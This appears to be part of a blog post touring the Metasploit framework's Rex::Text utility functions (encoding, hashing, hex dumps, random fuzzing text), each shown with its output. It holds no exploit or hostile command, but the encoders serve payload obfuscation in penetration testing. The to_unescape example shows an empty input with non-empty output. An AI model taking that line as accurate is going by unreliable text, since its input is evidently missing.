>> Rex::Text::decode_base64("aGVsbG8gd29ybGQ=")
=> "hello world"


Gzip:
>> Rex::Text::gzip("hello world")
=> "\037\213\b\000\251\342\001J\002\003\313H\315\311\311W(\317/\312I\001\000\205\021J\r\v\000\000\000"


Awesome:
>> Rex::Text::hex_to_raw('\x20\x2e\x2f')
=> " ./"

>> Rex::Text::hexify("Metasploit rocks!Metasploit rocks!Metasploit rocks!")
=> "\\x4d\\x65\\x74\\x61\\x73\\x70\\x6c\\x6f\\x69\\x74\\x20\\x72\\x6f\\x63\\x6b\n\\x73\\x21\\x4d\\x65\\x74\\x61\\x73\\x70\\x6c\\x6f\\x69\\x74\\x20\\x72\\x6f\n\\x63\\x6b\\x73\\x21\\x4d\\x65\\x74\\x61\\x73\\x70\\x6c\\x6f\\x69\\x74\\x20\n\\x72\\x6f\\x63\\x6b\\x73\\x21\n"


>> Rex::Text::html_encode("http://www.google.com?ggg&4=4")
=> "&#x68&#x74&#x74&#x70&#x3a&
#x2f&#x2f&#x77&#x77&#x77&#x2e&
#x67&#x6f&#x6f&#x67&#x6c&#x65&
#x2e&#x63&#x6f&#x6d&#x3f&#x67&
#x67&#x67&#x26&#x34&#x3d&#x34"



Useful:
>> Rex::Text::md5("hello world!+")
=> "7eae149fd806efc3f80c44223205daeb"
>> Rex::Text::md5_raw("hello world!+")
=> "~\256\024\237\330\006\357\303\370\fD\"2\005\332\353"



>> Rex::Text::rand_base(20,'',"A")
=> "AAAAAAAAAAAAAAAAAAAA"


>> Rex::Text::rand_hostname
=> "rycc.bcn8y.n.f.moyn0oq9.org"

For fuzzing:
> Rex::Text::rand_text(40,'-')
=> "\025\263\022v\340o\3334\253EV.5\335KM[\204s(\362\371V\223\341\343Y\232\025P*\260\225l\e\223\317\342\314\275"


For network dumps:
>> Rex::Text::to_hex_dump("hello World\n")
=> "68 65 6c 6c 6f 20 57 6f 72 6c 64 0a hello World.\n\n"

>> Rex::Text::to_unescape("")
=> "%u673c%u6767%u413e"



>> Rex::Text::to_unicode("hello")
=> "h\000e\000l\000l\000o\000"

This is a nice framework to build testing and automated security and QA solutions around. I will revisit MSF Core API in the next post.